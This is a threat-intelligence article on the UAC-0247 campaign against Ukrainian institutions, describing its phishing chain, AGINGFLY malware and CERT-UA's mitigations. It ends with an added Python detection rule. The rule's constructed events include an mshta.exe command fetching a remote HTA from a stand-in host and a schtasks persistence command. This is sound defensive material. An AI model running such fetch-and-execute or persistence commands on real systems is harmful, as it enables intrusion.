UAC-0247 Targets Ukrainian Institutions
Since early 2026, a threat group identified as UAC-0247 has been executing a cyber campaign aimed at Ukrainian governmental bodies and healthcare facilities, including hospitals and emergency services. The campaign is characterized by the theft of sensitive data from web browsers and WhatsApp, after which the attackers move laterally through compromised networks to extend their foothold.
Deceptive Tactics in Cyber Attacks
The campaign initiates with a cleverly disguised email, masquerading as a discussion about humanitarian aid. The email entices the recipient to click on a link. The attacker may either fabricate a fake website using AI tools or exploit Cross-Site Scripting (XSS) vulnerabilities on legitimate sites to deceive the victim. Clicking the link results in downloading an archive file onto the victim’s device.
Upon opening the archive, a shortcut (LNK) file is activated, which uses the built-in HTA handler (mshta.exe) to fetch and execute a remote HTA file. While this decoy occupies the victim, a background process drops a malicious file and executes it through a scheduled task.
Tools and Techniques Used by Attackers
CERT-UA analysts have linked this wave of attacks to intensified cyber activity observed in March and April 2026. The UAC-0247 group also targeted Ukrainian Defense Forces and FPV drone operators. In a documented incident on March 10, 2026, an archive named “bachu.zip” was distributed via the Signal messenger, falsely appearing as an update for the “BACHU” software used by FPV operators. The archive contained a DLL file that launched the AGINGFLY malware using a DLL side-loading method.
Investigations revealed a consistent modus operandi of data theft and network probing. CHROMELEVATOR was used to extract authentication details from browsers, while ZAPIXDESK targeted WhatsApp data. Additionally, subnet scanners and the RUSTSCAN tool were employed to map internal networks, and tools like LIGOLO-NG and CHISEL established covert network tunnels. In one case, the XMRIG miner was found concealed in a patched version of the WIREGUARD program.
Insights into AGINGFLY Malware
The AGINGFLY malware, written in C#, serves as the primary remote access tool for this campaign. It enables attackers to execute commands, download files, capture screenshots, activate keyloggers, and run code in memory remotely. Unlike similar tools, AGINGFLY’s command handlers are downloaded on demand from a C2 server and compiled at runtime on the infected host. Communication with the C2 server runs over web sockets and is encrypted with AES-CBC.
For sustained access, the attackers deploy a PowerShell script named SILENTLOOP, which autonomously runs commands, updates configurations, and retrieves the latest C2 server IP from a Telegram channel. If the primary source fails, it uses alternative methods to locate the C2 address. Initial access is achieved using a TCP reverse shell or RAVENSHELL, establishing an encrypted TCP connection with a 9-byte XOR key and communicating with the management server via CMD.
Strategies for Defense and Mitigation
CERT-UA advises organizations to mitigate exposure by restricting the execution of files like LNK, HTA, and JS on endpoint systems. It also recommends limiting the use of utilities such as mshta.exe, powershell.exe, and wscript.exe, which are exploited in this campaign. These measures align with standard practices for reducing attack surfaces and can be implemented without third-party tools.
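Added example, not part of the CERT-UA advisory: detection logic that applies the two observations above (mshta.exe executing a remote HTA, and a scheduled task created by one of the named utilities) to constructed process-creation events in a Sysmon-like shape. Field names, process IDs, paths and the URL are invented for illustration.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style), not real telemetry.
EVENTS = [
    {"pid": 4100, "ppid": 2000, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe "http://example.invalid/aid.hta"'},      # remote HTA
    {"pid": 4140, "ppid": 4120, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks.exe /create /tn Updater /tr "C:\\Users\\Public\\up.exe" /sc minute'},
    {"pid": 4160, "ppid": 2000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},    # local HTA, benign here
]

# A URL on the mshta command line means the HTA is being pulled from a remote host.
REMOTE_URL = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
# Utilities the advisory recommends restricting; a task created by one of them is suspicious.
RESTRICTED_UTILITIES = {"mshta.exe", "powershell.exe", "wscript.exe"}


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, reason) findings for the two infection-chain steps."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        # Step 1: mshta.exe fetching and executing an HTA from a URL.
        if name == "mshta.exe" and REMOTE_URL.search(e["cmdline"]):
            findings.append((e["pid"], "mshta fetching remote HTA"))
        # Step 2: scheduled task created with a restricted utility as the parent.
        if name == "schtasks.exe" and "/create" in e["cmdline"].lower():
            parent = by_pid.get(e["ppid"])
            if parent and basename(parent["image"]) in RESTRICTED_UTILITIES:
                findings.append((e["pid"], f"scheduled task created by {basename(parent['image'])}"))
    return findings


if __name__ == "__main__":
    for pid, reason in detect(EVENTS):
        print(pid, reason)
```

The local HTA launched by event 4160 produces no finding, so the rule keys on the remote fetch and the parent chain rather than on mshta.exe alone.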
